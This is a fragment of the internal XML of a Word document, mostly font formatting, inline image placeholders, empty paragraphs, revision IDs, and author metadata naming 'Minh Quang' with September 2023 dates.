            <wp:extent cx="4559300" cy="15510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936" cy="15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F4" w:rsidRDefault="00D608F4" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D608F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC13DA0" wp14:editId="09F4296D">
            <wp:extent cx="5943600" cy="243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35" w:rsidRDefault="00C52235" w:rsidP="003B7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3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52235" w:rsidRPr="00355BF2" w:rsidRDefault="00C52235" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52235">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682D1ACB" wp14:editId="34B2C808">
            <wp:extent cx="5943600" cy="1826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8F7" w:rsidRDefault="00B708F7" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0066678D" w:rsidRDefault="0066678D" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00086E9D" w:rsidRPr="00086E9D" w:rsidRDefault="00086E9D" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00086E9D" w:rsidRDefault="00086E9D" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000343DE" w:rsidRPr="000343DE" w:rsidRDefault="000343DE" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB609F" w:rsidRPr="000343DE" w:rsidRDefault="00BB609F" w:rsidP="003B753F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BB609F" w:rsidRPr="0003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5583E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1FC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F"/>
    <w:rsid w:val="000343DE"/>
    <w:rsid w:val="00045B41"/>
    <w:rsid w:val="00086E9D"/>
    <w:rsid w:val="001254A2"/>
    <w:rsid w:val="001B43CF"/>
    <w:rsid w:val="002B4488"/>
    <w:rsid w:val="002F4E1F"/>
    <w:rsid w:val="0030523A"/>
    <w:rsid w:val="00344EED"/>
    <w:rsid w:val="00355BF2"/>
    <w:rsid w:val="00391A99"/>
    <w:rsid w:val="003A35E3"/>
    <w:rsid w:val="003B753F"/>
    <w:rsid w:val="00571331"/>
    <w:rsid w:val="00624DDB"/>
    <w:rsid w:val="0066678D"/>
    <w:rsid w:val="006A0636"/>
    <w:rsid w:val="00703D97"/>
    <w:rsid w:val="00794050"/>
    <w:rsid w:val="007A5250"/>
    <w:rsid w:val="007C60FC"/>
    <w:rsid w:val="008B0EA5"/>
    <w:rsid w:val="00992B55"/>
    <w:rsid w:val="009A3E2F"/>
    <w:rsid w:val="009B3819"/>
    <w:rsid w:val="00A25121"/>
    <w:rsid w:val="00A93F93"/>
    <w:rsid w:val="00AF11D1"/>
    <w:rsid w:val="00B708F7"/>
    <w:rsid w:val="00BA6D22"/>
    <w:rsid w:val="00BB609F"/>
    <w:rsid w:val="00C21A88"/>
    <w:rsid w:val="00C52235"/>
    <w:rsid w:val="00CF5B8E"/>
    <w:rsid w:val="00D56D5A"/>
    <w:rsid w:val="00D608F4"/>
    <w:rsid w:val="00DA55E9"/>
    <w:rsid w:val="00DF37C1"/>
    <w:rsid w:val="00EB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1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Quang</dc:creator>
  <cp:lastModifiedBy>Minh Quang</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-02T09:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-06T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>